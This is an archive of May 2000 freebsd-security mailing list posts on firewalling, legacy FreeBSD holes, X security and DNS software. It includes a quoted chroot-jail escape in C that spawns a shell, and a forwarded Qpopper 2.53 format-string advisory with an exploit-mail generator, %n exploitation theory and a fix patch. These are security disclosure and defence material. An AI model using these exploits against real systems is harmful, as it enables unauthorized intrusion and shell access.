a fixed list of IP-MAC pairs? This would not be a deny list, but rather an accept list and then a default deny. That may or may not be acceptable. I believe this can be done by turning off ARP on the interface and using arp(8) to build a static MAC-IP mapping of your own. Just a pretty easy to do idea. > On Mon, May 22, 2000 at 01:08:30PM -0500, Blake Matheny wrote: > > Is there a way to deny by mac address rather than ip address? I need to > > deny a group of computers (with static ip's) access to the internet, but > > if someone changes their ip (with DHCP) it doesn't do any good. These are > > windows boxes with a freebsd firewall, no policies on the computers and if > > possible I would like to implement this only on the firewall level. Anyone > > got any advice? Thanks. > > -Blake > > > > Blake Matheny > > Bussert Consulting > > Network Engineer > > (765)423-2100 > > matheny@bussert.com -- Crist J. Clark cjclark@home.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 22 20:32:34 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 73A3B37B53C; Mon, 22 May 2000 20:32:32 -0700 (PDT) (envelope-from kris@FreeBSD.org) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id UAA38694; Mon, 22 May 2000 20:32:32 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Mon, 22 May 2000 20:32:32 -0700 (PDT) From: Kris Kennaway To: Fernando Schapachnik Cc: Warner Losh , cjclark@home.com, freebsd-security@FreeBSD.ORG Subject: Re: The procfs Hole in 2.2.8-STABLE? In-Reply-To: <200005230126.WAA02250@ns1.via-net-works.net.ar> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 22 May 2000, Fernando Schapachnik wrote: > Any of them is a remote exploit? Have an URL? Read the security advisories at http://www.freebsd.org/security Kris ---- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 22 20:45:36 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id A664A37B854 for ; Mon, 22 May 2000 20:45:30 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id VAA08938; Mon, 22 May 2000 21:45:22 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id VAA99816; Mon, 22 May 2000 21:44:21 -0600 (MDT) Message-Id: <200005230344.VAA99816@harmony.village.org> To: Fernando Schapachnik Subject: Re: The procfs Hole in 2.2.8-STABLE? Cc: cjclark@home.com, freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Mon, 22 May 2000 22:26:15 -0300." <200005230126.WAA02250@ns1.via-net-works.net.ar> References: <200005230126.WAA02250@ns1.via-net-works.net.ar> Date: Mon, 22 May 2000 21:44:21 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <200005230126.WAA02250@ns1.via-net-works.net.ar> Fernando Schapachnik writes: : En un mensaje anterior, Warner Losh escribió: : > We stopped committing to make backports to 2.x when FreeBSD 3.2 was : > released, or about this time last year. Anything that happened after : > that may or may not hav emade it back to 2.2.8. Also, some of them : > weren't noteworthy at the time, so no advisory was issued (I had the : > advisory setting too high). Some exploits have surfaced against old : > versions of FreeBSD. There's no central collection of these : > documented anywhere. I wish I had a better answer for you than this. : : Any of them is a remote exploit? Have an URL? I don't think so. However, I can't say for sure. It has been a while since I've been focused on 2.x enough to know that all holes have been fixed. I just don't have the information that you want. Generally speaking, if the advisory doesn't mention the version of freebsd you are interested in, then the bug is likely still in that version. Also, there have been several DoS bugs that people have written exploits for after bugs were corrected in FreeBSD. Not all of these have had advisories since some of them have come along months or years after the bug fix. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 22 21:11:43 2000 Delivered-To: freebsd-security@freebsd.org Received: from public.bta.net.cn (public.bta.net.cn [202.96.0.97]) by hub.freebsd.org (Postfix) with ESMTP id 783D737B898 for ; Mon, 22 May 2000 21:11:33 -0700 (PDT) (envelope-from robinson@netrinsics.com) Received: from netrinsics.com ([202.108.133.96]) by public.bta.net.cn (8.9.3/8.9.3) with ESMTP id LAA12630 for ; Tue, 23 May 2000 12:04:07 +0800 (GMT) Received: (from robinson@localhost) by netrinsics.com (8.9.3/8.9.3) id LAA35900; Tue, 23 May 2000 11:58:57 +0800 (+0800) (envelope-from robinson) Date: Tue, 23 May 2000 11:58:57 +0800 (+0800) From: Michael Robinson Message-Id: <200005230358.LAA35900@netrinsics.com> To: bdeless@efn.org, freebsd-security@freebsd.org Subject: Re: Web Server and Xwindows In-Reply-To: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >I currently run a web site on a 4.0 box using the >current version of Apache. I must confess a desire to install X(w/KDE) >now. This box is in the DMZ, has PHP3 and MySQL. Sendmail is also handled here. Use IPSEC. -Michael Robinson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 22 21:33:29 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 1CFE937B9D9 for ; Mon, 22 May 2000 21:33:27 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id WAA18625; Mon, 22 May 2000 22:32:54 -0600 (MDT) Message-Id: <4.3.1.2.20000522222344.00dd2870@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.1 Date: Mon, 22 May 2000 22:32:49 -0600 To: Warner Losh , Fernando Schapachnik From: Brett Glass Subject: Re: The procfs Hole in 2.2.8-STABLE? Cc: cjclark@home.com, freebsd-security@FreeBSD.ORG In-Reply-To: <200005230344.VAA99816@harmony.village.org> References: <200005230126.WAA02250@ns1.via-net-works.net.ar> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 09:44 PM 5/22/2000, Warner Losh wrote: >Generally speaking, if the advisory doesn't mention the version of >freebsd you are interested in, then the bug is likely still in that >version. Also, there have been several DoS bugs that people have >written exploits for after bugs were corrected in FreeBSD. Not all of >these have had advisories since some of them have come along months or >years after the bug fix. As far as I know, the only remote exploits for 2.2.8 itself are DoS attacks, not root exploits. However, there ARE root exploits for some of the ported third-party daemons that were included with that release. Make sure that key daemons such as Apache, BIND, SSH, QPopper, etc. are updated and that unnecessary services are shut down. You should then be OK. The biggest stability problems in 2.2.8 have to do with problems in some of the old PCI and ATAPI code. (On some machines, it was necessary to compile with the ATAPI_STATIC option and remove the PCI driver to make the system stable, as I learned the hard way.) I administer very few systems that still run 2.2.8, but there are some. They're small-memory systems that would have trouble with the larger kernels generated by later versions. --Brett Glass To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 23 4:43:49 2000 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.tsc.tdk.com (gatekeeper.tsc.tdk.com [207.113.159.21]) by hub.freebsd.org (Postfix) with ESMTP id 0D0BB37B54E for ; Tue, 23 May 2000 04:43:46 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from imap.gv.tsc.tdk.com (imap.gv.tsc.tdk.com [192.168.241.198]) by gatekeeper.tsc.tdk.com (8.8.8/8.8.8) with ESMTP id EAA04592; Tue, 23 May 2000 04:39:38 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from salsa.gv.tsc.tdk.com (salsa.gv.tsc.tdk.com [192.168.241.194]) by imap.gv.tsc.tdk.com (8.9.3/8.9.3) with ESMTP id EAA63416; Tue, 23 May 2000 04:39:38 -0700 (PDT) (envelope-from Don.Lewis@tsc.tdk.com) Received: (from gdonl@localhost) by salsa.gv.tsc.tdk.com (8.8.5/8.8.5) id EAA13204; Tue, 23 May 2000 04:39:36 -0700 (PDT) From: Don Lewis Message-Id: <200005231139.EAA13204@salsa.gv.tsc.tdk.com> Date: Tue, 23 May 2000 04:39:35 -0700 In-Reply-To: <2780.958684841@critter.freebsd.dk> References: <2780.958684841@critter.freebsd.dk> X-Mailer: Mail User's Shell (7.2.6 beta(5) 10/07/98) To: Poul-Henning Kamp , Harold Gutch Subject: Re: envy.vuurwerk.nl daily run output Cc: Cy Schubert - ITSD Open Systems Group , Paul Hart , Adam Laurie , freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On May 18, 11:20pm, Poul-Henning Kamp wrote: } Subject: Re: envy.vuurwerk.nl daily run output } } Please check the action of the "kern.chroot_allow_open_directories" } for a deeper explanation of this one. It is not set to zero for } fear of compatibility issues. Maybe we should set it to zero in } -current to see if there are any such issues. That only protects against carelessly written chroot wrappers that leave file descriptors open that point to directories outside the jail. Given that, even a non-root process can escape. Even with kern.chroot_allow_open_directories disabled, I know of two ways that a process can escape if it can fork() and can execute chroot() again (the latter requires the process to be root), unless further modifications have been made to the chroot syscall. These changes have been in FreeBSD 4.x and later since last September. } In message <20000512200619.A14067@foobar.franken.de>, Harold Gutch writes: } >What about the "other" chroot-breakout, does it still work under } >FreeBSD 4.0? Try statically linking the executable and doing: mkdir jail jail/tmp cp a.out jail chroot jail a.out This code should be able to escape the jail in 3.x. In 4.x it will be able to escape jail/tmp (if kern.chroot_allow_open_directories is enabled) but it won't be able to escape jail. } >Here's the breakout-code modulo checks wether /tmp exists etc. } > } >#include } >#include } >#include } > } >int main(int argc, char *argv[]) } >{ } > int handle, i; } > } > handle = open("/", O_RDONLY); } > chroot("/tmp"); } > chdir("/"); } > fchdir(handle); } > for (i = 0; i < 32; i++) } > chdir(".."); } > chroot("."); } > chdir("/"); } > system("/bin/sh"); } > } > return 0; } >} To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 23 9: 4:40 2000 Delivered-To: freebsd-security@freebsd.org Received: from berlin.axl.net (berlin.axl.net [216.66.11.23]) by hub.freebsd.org (Postfix) with SMTP id 12B5237B8FB for ; Tue, 23 May 2000 09:04:35 -0700 (PDT) (envelope-from matt@axl.net) Received: (qmail 62597 invoked by uid 85); 23 May 2000 16:05:29 -0000 Received: from matt@axl.net by berlin.axl.net with scan4virus-0.19 (sweep: 1.8/3.33. . Clean. Processed in 0.679938 secs); 23/05/2000 16:05:28 Received: from ws-01.matthennigus.lightningdsl.net (HELO sinister) (216.66.30.66) by berlin.axl.net with SMTP; 23 May 2000 16:05:27 -0000 From: "Matthew B. Henniges" To: Cc: Subject: RE: pid file for named Date: Tue, 23 May 2000 12:07:33 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) In-Reply-To: <20000522133305.A40314@mithrandr.moria.org> Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > On Sun 2000-05-21 (22:21), Chris Johnson wrote: > > That hasn't been my experience, and I'm running djb's (that's Daniel J. > > Bernstein, if anyone's wondering) dnscache/tinydns everywhere. > If you have > > performance problems, try posting a message to > dns@list.cr.yp.to and see if > > anyone has anything to offer. It's much faster for me as well, but even if it wasn't, I would still use it. My primary reason for switching was security. > > > > I've been BIND-free since dnscache's first alpha release, and I > haven't had a > > single problem. Yeah, it's been fine for me ever since .69 or so... > Have you tried the port? I haven't been able to find anyone else to > test it properly. I'd appreciate some feedback. I have never used the port, however, dnscache goes on all my machines...A working port would great to have. I'll test it a bit for you. > > Neil (who is unfortunately maintainer for most of the djb ports) I'm a big fan of DJB software. qmail, daemontools, ezmlm-idx, and dnscache are all very important to me. I'll be happy to help you with any of those. Matthew B. Henniges CoPresident Axl.net Communications http://www.axl.net (203) 552-1714 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 23 15:28:26 2000 Delivered-To: freebsd-security@freebsd.org Received: from clavin.efn.org (clavin.efn.org [206.163.176.10]) by hub.freebsd.org (Postfix) with ESMTP id 19E8737B6F7 for ; Tue, 23 May 2000 15:28:23 -0700 (PDT) (envelope-from bdeless@efn.org) Received: from garcia.efn.org (bdeless@garcia.efn.org [206.163.176.5]) by clavin.efn.org (8.10.1/8.10.1) with ESMTP id e4NMSMx15408; Tue, 23 May 2000 15:28:22 -0700 (PDT) Received: from localhost (bdeless@localhost) by garcia.efn.org (8.10.1/8.10.1) with ESMTP id e4NMSKj24555; Tue, 23 May 2000 15:28:20 -0700 (PDT) X-Authentication-Warning: garcia.efn.org: bdeless owned process doing -bs Date: Tue, 23 May 2000 15:28:18 -0700 (PDT) From: BD To: Michael Robinson Cc: freebsd-security@FreeBSD.ORG Subject: Re: Web Server and Xwindows In-Reply-To: <200005230358.LAA35900@netrinsics.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I've never used or installed IPSEC although I'm aware that is part of 4.0(?). Since I will only use X localy is this still necessary? I had planned to use ipfw to block X at the interface. I am completly ignorant when it comes to securing X (that's why I've never used it before). I apologize if this should have gone to questions but I felt this list was probably where I would get the best answer. (list newbie) Thanks Again, Robert On Tue, 23 May 2000, Michael Robinson wrote: > >I currently run a web site on a 4.0 box using the > >current version of Apache. I must confess a desire to install X(w/KDE) > >now. This box is in the DMZ, has PHP3 and MySQL. Sendmail is also handled here. > > Use IPSEC. > > -Michael Robinson > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 23 18:48: 6 2000 Delivered-To: freebsd-security@freebsd.org Received: from sin.core-sdi.com (sin.core-sdi.com [200.49.71.179]) by hub.freebsd.org (Postfix) with ESMTP id 8334837BB34; Tue, 23 May 2000 18:47:57 -0700 (PDT) (envelope-from alejo@core-sdi.com) Received: from amadeus.servers.core-sdi.com (amadeus.servers.core-sdi.com [192.168.13.3]) by sin.core-sdi.com (Postfix) with ESMTP id 05F7F1E01; Tue, 23 May 2000 23:00:18 -0300 (ART) Received: from core-sdi.com (mona.corelabs.core-sdi.com [192.168.66.201]) by amadeus.servers.core-sdi.com id AAA23514; Wed, 24 May 2000 00:33:14 -0300 Message-ID: <392B3543.B8AA689A@core-sdi.com> Date: Tue, 23 May 2000 22:49:55 -0300 From: Alejo Sanchez X-Mailer: Mozilla 4.61 [en] (X11; U; OpenBSD 2.7 i386) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-hackers@freebsd.org, freebsd-security@freebsd.org, tech-security@netbsd.org, tech-misc@netbsd.org, debian-security@lists.debian.org, debian-testing@lists.debian.org Subject: TESTERS NEEDED: msyslog pre-release Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, We have a pre-release of the new modular syslog system is available for download. It has been tested under OpenBSD 2.6 and 2.7, and RedHat 6.1, but we'd like to hear from you. It's the predecessor of the secure syslog. Here's a brief list of features: * Input and output was heavily modularized, and writing new modules is very easy * New authentication + integrity PEO module (as in previous ssyslog) * New output to mysql module And of course, its license is BSD :) Still, there is lot of space for improve. That's we we ask you to take some time and test it, send your suggestions, comments, patches or anything else you think important. For this matter, we have set up 2 mailing lists: msyslog-dev, for technical discussions and msyslog-usr, for general usage. To subscribe to them you have to send a mail to majordomo@core-sdi.com, containing in its body: subscribe msyslog-usr and/or subscribe msyslog-dev Cheers, Alejo -- Alejo Sanchez - Developer alejo@core-sdi.com Core SDI S.A. http://www.core-sdi.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 23 19:53:30 2000 Delivered-To: freebsd-security@freebsd.org Received: from cc942873-a.ewndsr1.nj.home.com (cc942873-a.ewndsr1.nj.home.com [24.2.89.207]) by hub.freebsd.org (Postfix) with ESMTP id D330F37BB3D for ; Tue, 23 May 2000 19:53:23 -0700 (PDT) (envelope-from cjc@cc942873-a.ewndsr1.nj.home.com) Received: (from cjc@localhost) by cc942873-a.ewndsr1.nj.home.com (8.9.3/8.9.3) id WAA40604; Tue, 23 May 2000 22:53:12 -0400 (EDT) (envelope-from cjc) Date: Tue, 23 May 2000 22:53:12 -0400 From: "Crist J. Clark" To: BD Cc: Michael Robinson , freebsd-security@FreeBSD.ORG Subject: Re: Web Server and Xwindows Message-ID: <20000523225312.C40441@cc942873-a.ewndsr1.nj.home.com> Reply-To: cjclark@home.com References: <200005230358.LAA35900@netrinsics.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: ; from bdeless@efn.org on Tue, May 23, 2000 at 03:28:18PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, May 23, 2000 at 03:28:18PM -0700, BD wrote: > I've never used or installed IPSEC although I'm aware that is part of > 4.0(?). Since I will only use X localy is this still necessary? I had > planned to use ipfw to block X at the interface. I am completly ignorant > when it comes to securing X (that's why I've never used it before). > > I apologize if this should have gone to questions but I felt this list was > probably where I would get the best answer. (list newbie) If you are only concerned about remote attacks from users with no authorized access to the box, then I think blocking the usual X ports is adequate. And do also make sure XDMCP is not enabled anyway. However, if you are concerned about users with accounts on the box, it's a different matter. X has plenty of setuid, and I would guess something like KDE adds a bunch more. X also is well known for letting average users mess with one another's "stuff" if not configured very tightly. But remember, if the X users are sitting at the box and have physical access to it... game's already over. No security without physical security, so why sweat over some possible, but as yet unknown, local X exploits? My $0.02. -- Crist J. Clark cjclark@home.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 24 2: 0:13 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns1.sunesi.net (ns1.sunesi.net [196.15.192.194]) by hub.freebsd.org (Postfix) with ESMTP id DD98137BC23 for ; Wed, 24 May 2000 02:00:05 -0700 (PDT) (envelope-from nbm@sunesi.net) Received: from nbm by ns1.sunesi.net with local (Exim 3.03 #1) id 12uX1A-000Gsr-00; Wed, 24 May 2000 10:59:56 +0200 Date: Wed, 24 May 2000 10:59:56 +0200 From: Neil Blakey-Milner To: "Matthew B. Henniges" Cc: freebsd-security@freebsd.org Subject: Re: pid file for named Message-ID: <20000524105956.A64851@mithrandr.moria.org> References: <20000522133305.A40314@mithrandr.moria.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: ; from matt@axl.net on Tue, May 23, 2000 at 12:07:33PM -0400 Organization: Sunesi Clinical Systems X-Operating-System: FreeBSD 3.3-RELEASE i386 X-URL: http://rucus.ru.ac.za/~nbm/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue 2000-05-23 (12:07), Matthew B. Henniges wrote: > > Have you tried the port? I haven't been able to find anyone else to > > test it properly. I'd appreciate some feedback. > > I have never used the port, however, dnscache goes on all my machines...A > working port would great to have. I'll test it a bit for you. It's all sitting there in /usr/ports/net/dnscache, have fun. (: > > Neil (who is unfortunately maintainer for most of the djb ports) > > I'm a big fan of DJB software. > > qmail, daemontools, ezmlm-idx, and dnscache are all very important to me. > I'll be happy to help you with any of those. Yeah, I directly admin, and help admin and support a large number of "djb" machines. The software works. Maintaining the occasional non-backwards-compatible change is a bit more of a problem - hence daemontools53, and daemontools ports. Any help appreciated, but I'm not looking to rid myself of the work. Neil -- Neil Blakey-Milner Sunesi Clinical Systems nbm@mithrandr.moria.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 24 2:17: 8 2000 Delivered-To: freebsd-security@freebsd.org Received: from public.bta.net.cn (public.bta.net.cn [202.96.0.97]) by hub.freebsd.org (Postfix) with ESMTP id C57E837BA8D for ; Wed, 24 May 2000 02:16:47 -0700 (PDT) (envelope-from robinson@netrinsics.com) Received: from netrinsics.com ([202.108.133.96]) by public.bta.net.cn (8.9.3/8.9.3) with ESMTP id RAA06354 for ; Wed, 24 May 2000 17:13:04 +0800 (GMT) Received: (from robinson@localhost) by netrinsics.com (8.9.3/8.9.3) id OAA37954; Wed, 24 May 2000 14:11:37 +0800 (+0800) (envelope-from robinson) Date: Wed, 24 May 2000 14:11:37 +0800 (+0800) From: Michael Robinson Message-Id: <200005240611.OAA37954@netrinsics.com> To: bdeless@efn.org, robinson@netrinsics.com Subject: Re: Web Server and Xwindows Cc: freebsd-security@freebsd.org In-Reply-To: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org BD writes: >I've never used or installed IPSEC although I'm aware that is part of >4.0(?). Since I will only use X localy is this still necessary? I had >planned to use ipfw to block X at the interface. In that case, you should probably block everything at the interface, and only allow the absolute minimum necessary for your primary services. -Michael Robinson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 24 14:40:22 2000 Delivered-To: freebsd-security@freebsd.org Received: from mercury.jorsm.com (mercury.jorsm.com [207.112.128.9]) by hub.freebsd.org (Postfix) with ESMTP id EE3A537B6CD for ; Wed, 24 May 2000 14:40:01 -0700 (PDT) (envelope-from jer@jorsm.com) Received: by mercury.jorsm.com (Postfix, from userid 1850) id 21F85E4A22; Wed, 24 May 2000 16:40:00 -0500 (CDT) Received: from localhost (localhost [127.0.0.1]) by mercury.jorsm.com (Postfix) with ESMTP id 0F300E0C01 for ; Wed, 24 May 2000 16:40:00 -0500 (CDT) Date: Wed, 24 May 2000 16:40:00 -0500 (CDT) From: Jeremy Shaffner To: freebsd-security@freebsd.org Subject: QPOPPER: Remote gid mail exploit Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=X-UNKNOWN Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org [Patch is at the end] Here is the original advisory. Note that the actual advisory is correct WRT the file and line numbers. The posts on Bugtraq indicate to patch pop_msg.c instead of pop_uidl.c. ------>8---------- =09 _____________________________________________________________________ =09 b u f f e r 0 v e r f l 0 w s e c u r i t y a d v i s o r y # 5= =20 =09=09=09 =09=09 Advisory Name: Remote shell via Qpopper2.53 =09=09 Date: 5/23/00 =09 =09 Application: Qpopper 2.53 for *NIX =09 Vendor: Qualcomm Incorporated =09=09 WWW: www.qualcomm.com =09=09 Severity: can give users remote shell with gid=3Dmail. =09=09 Author: prizm (prizm@resentment.org) =09=09=09 Homepage: b0f.freebsd.lublin.pl * Overview =09Qpopper is the most widely-used server for the POP3 protocol. This allow= s users to=20 =09access their mail using any POP3 client. Qpopper supports the latest st= andards, and includes a large number of optional features. Qpopper is norma= lly used with standard UNIX mail transfer and delivery agents such as sendmail or= smail.=20 * The Problem =09Yes, Qpop, again and again...=20 =09There is a bug in version 2.53 of Qpop that can give you a remote =09shell with gid=3Dmail. Problem is with euidl command which uses user inp= ut as=20 =09format string for pop_msg() function. =09Lets examine following code from Qpop 2.53 source: =09--> pop_uidl.c, around line 150: =09 ................ =09 sprintf(buffer, "%d %s", msg_id, mp->uidl_str); =09 if (nl =3D index(buffer, NEWLINE)) *nl =3D 0; =09 sprintf(buffer, "%s %d %.128s", buffer, mp->length, from_hdr(p, = mp)); =09 ! return (pop_msg (p,POP_SUCCESS, buffer)); ^^^^^^^^^^^^^ =09 ................. =09Function pop_msg() is declared in pop_msg.c as pop_msg(POP *p, int stat, =09const char *format,...), and here we have user-input as format string. L= ame.=20 =09Ok, back to problem, imagine following smtp session: =09 MAIL FROM: =09 200 Ok =09 RCPT TO: =09 200 Ok =09 data =09 200 Okey, okey. end with "." =09 Subject: still trust qpop?=3D/ =09 X-UIDL: AAAAAAAAAAAAAAAA =09 From: %p%p%p%p%p%p%p =09 test =09 . =09 200 BLABLABLA Ok, message accepted for delivery. =09 Then, luser connects with his pop account and runs euidl command there= : =09=09+OK QPOP (version 2.53) at b0f starting. <666.666@b0f> =09=09USER luser =09=09+OK Password required for luser. =09=09PASS secret =09=09+OK luser has 3 messages (1644 octets). =09=09euidl 3 =09=09+OK 2 AAAAAAAAAAAAAAAA 530 0xbfbfc9b00x804fd740xbfbfc9b00x2120x8052e5= e0xbfbfd1e80x8057028 =09 Yeah, thats from my box with FreeBSD. As you can see, our %p%p%p%p%p%p= %p =09 where implemented as arguments for vsnprintf() command. * Exploiting Is this possible? Yeah, sure! =09 But there are some limits. Qpopper2.53 from FreeBSD ports with patches = is=20 =09 much more difficult to exploit than one from linux. It is because freeb= sd=20 =09 patches change vsprintf() call in pop_msg.c to vsnprintf() call, and th= ere is =09 big difference between them. Qpopper with FreeBSD's patches IS exploita= ble. Exploit ------- /* qpop_euidl.c exploit by prizm/Buffer0verflow Security * * Sample exploit for buffer overflow in Qpopper 2.53. * This little proggie generates a mail u need to send. * * Standard disclaimer applies. * By the way, exploit is broken =3D) You need to insert shellcode. * * MAD greets to tf8 for pointing out the bug, and all other b0f members. * greets to USSRLabs and ADM * check http://b0f.freebsd.lublin.pl/ for news. */ #include #include char shellcode[]=3D"imnothing"; int main(int argc, char *argv[]) { =09int i; =09unsigned long ra=3D0; =09if(argc!=3D2) { =09=09fprintf(stderr,"Usage: %s return_addr\n", argv[0]); =09=09exit(0); =09} =09sscanf(argv[1], "%x", &ra); =09if(!ra)=20 =09=09return; =09if(sizeof(shellcode) < 12 || sizeof(shellcode) > 76) { =09=09fprintf(stderr,"Bad shellcode\n"); =09=09exit(0); =09} =09fprintf(stderr,"return address: 0x%.8x\n", ra); =09printf("X-UIDL: "); =09for(i=3D0; i < sizeof(shellcode);i++) =09=09printf("%c", shellcode[i]); =09printf("\r\n"); =09printf("From: %s", "%.1000d"); =09for(i=3D0; i < 50; i++)=20 =09=09printf("%c%c%c%c", (ra & 0xff), (ra & 0xff00)>>8, (ra & 0xff0000)>>16= , (ra & 0xff000000)>>24); =09printf("@test\r\n"); =09printf("Subject: test\r\n\r\nhuh?\r\n.\r\n"); =09return 0; } =09Exploiting QPOP from FreeBSD ports =09---------------------------------- =09It is NOT easy, because vsprintf() is replaced with vsnprintf() so we ca= n't =09overflow stack, but we still have control over it (remeber %n?). =09Im not going to post exploit for this because it is really generic, but = I =09will explain theory on exploiting qpop with vsNprintf. =09There is an little trick with %n YOu should know. Try to understand why =09folowing code succeeds and prints out 2000, not sizeof(b): ------ #include int main(void){ int s=3D1; char b[1024]; int q; snprintf(b, sizeof(b), "%.2000d%n", 1, &q); return printf("%d, overflowed? %s\n", q, (s=3D=3D1?"NO":"YES")); } ------ =09On my box with FreeBSD 3.4 i have: =092000, overflowed? NO =09Hah, first time i expected to see 1024, but YOu know that all is =09unpredictable . So, this little thing will help us a lot. =09Exploiting it: =09a) Find where in stack is located user input. =09b) Compose a message with filed X-UIDL and From: =09=09X-UIDL: ppRETARETARETARETA =09=09From: %.RETURNd%n@test =09where: =09"pp"=09=09=09is for padding (two or three chars) =09"RETA"=09=09is return address pointing to SHELLCODE =09"SHELLCODE"=09=09guess =09"RETURN"=09=09return address =09c) Exploit? If you need an exploit that will work on FreeBSD, code it yo= urself. * Vulnerable Versions =092.53(Others?) =20 * Fix =09You can download Qpopper 3.1 at http://www.eudora.com/freeware/qpop.html= #CURRENT which is not vulnerable to this problem. =09Or you can manually patch it by doing the following:=20 =09 At lines 152 and 62 from pop_uidl.c, replace: =09- return (pop_msg (p,POP_SUCCESS, buffer)); =09 to: =09+ return (pop_msg (p,POP_SUCCESS, "%s", buffer)); =09=09=09 =09=09=09=09=09 copyright =A9 1999-2000 =09=09=09=09 prizm, buffer0verfl0w security =09=09=09=09=09 b0f.freebsd.lublin.pl ---------->8------------=20 Here is the resulting patch: ---------8<-------- --- pop_uidl.c.orig Wed May 24 15:58:53 2000 +++ pop_uidl.c Wed May 24 16:21:56 2000 @@ -59,7 +59,7 @@ =20 sprintf(buffer, "%d %s", msg_id, mp->uidl_str); if (nl =3D index(buffer, NEWLINE)) *nl =3D 0; - return (pop_msg (p,POP_SUCCESS, buffer)); + return (pop_msg (p,POP_SUCCESS, "%s", buffer)); } } else { /* yes, we can do this */ @@ -149,7 +149,7 @@ sprintf(buffer, "%d %s", msg_id, mp->uidl_str); if (nl =3D index(buffer, NEWLINE)) *nl =3D 0; sprintf(buffer, "%s %d %.128s", buffer, mp->length, from_hdr(p, mp)); - return (pop_msg (p,POP_SUCCESS, buffer)); + return (pop_msg (p,POP_SUCCESS, "%s", buffer)); } } else { /* yes, we can do this */ ------->8----------=20 --- Jeremy Shaffner System Administrator JORSM Internet jer@jorsm.com http://www.jorsm.com/~jer/pgp.key To Unsubscribe: send mail to 